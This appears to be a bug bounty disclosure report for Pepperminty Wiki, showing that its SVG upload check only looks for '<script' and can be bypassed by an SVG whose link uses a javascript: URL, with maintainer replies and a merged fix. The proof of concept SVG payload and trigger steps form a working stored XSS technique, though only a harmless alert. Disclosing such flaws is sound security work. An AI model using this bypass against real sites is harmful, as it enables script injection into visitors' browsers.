Unrestricted Upload of File with Dangerous Type in sbrl/pepperminty-wiki

Valid

Reported on

Sep 14th 2021


Unrestricted Upload of File with Dangerous Type allows javascript injection

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker to inject javascript code via SVG uploads.

https://github.com/sbrl/Pepperminty-Wiki is vulnerable to command injection as shown below:

Proof of Concept

Pepperminty-wiki allows to upload SVG files, and perform security checks to avoid code injection.
However this checks can be bypassed.
Variable: $temp_filename
Snippet:

function upload_check_svg($temp_filename)
{
    global $settings;
    // Check for script tags
    if(strpos(file_get_contents($temp_filename), "<script") !== false)

Payload

Install pepermint release index.php and login.

Create a file image.svg with the following content:

<?xml version="1.0" standalone="no"?>
<svg viewBox="100 100 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript:alert(/XSS/)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>

Goto http://localhost/Pepperminty-Wiki/index.php?action=upload and upload the image.
Visit http://localhost/Pepperminty-Wiki/Files/image.svg and clic the image. Observe the XSS via the file upload

Impact

The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
Ziding Zhang
2 months ago

Admin


Hey hitisec, I've emailed the maintainers for you.

We have contacted a member of the sbrl/pepperminty-wiki team and are waiting to hear back 2 months ago
Starbeamrainbowlabs
2 months ago

Maintainer


This is an interesting one. Under normal circumstances, this is not an issue, since when you load an SVG in an <img /> tag Javascript is NOT executed. However, if the raw file is viewed directly, then this could potentially be an issue. The fix for this would be to serve a content-security-policy HTTP header that force-disables Javascript - I'll look into fixing that.

Starbeamrainbowlabs confirmed that a fix has been merged on 7b6cbb 2 months ago
The fix bounty has been dropped
Starbeamrainbowlabs
2 months ago

Maintainer


Fixed! I see there's bounty on this and while I'd love to pay, I really can't afford it at the moment. I'm a student working on a small-time project that receives no donations.

Jamie Slome
2 months ago

Admin


We cover the bounty for you! Nothing to worry about on that front!

Starbeamrainbowlabs
2 months ago

Maintainer


Thanks :D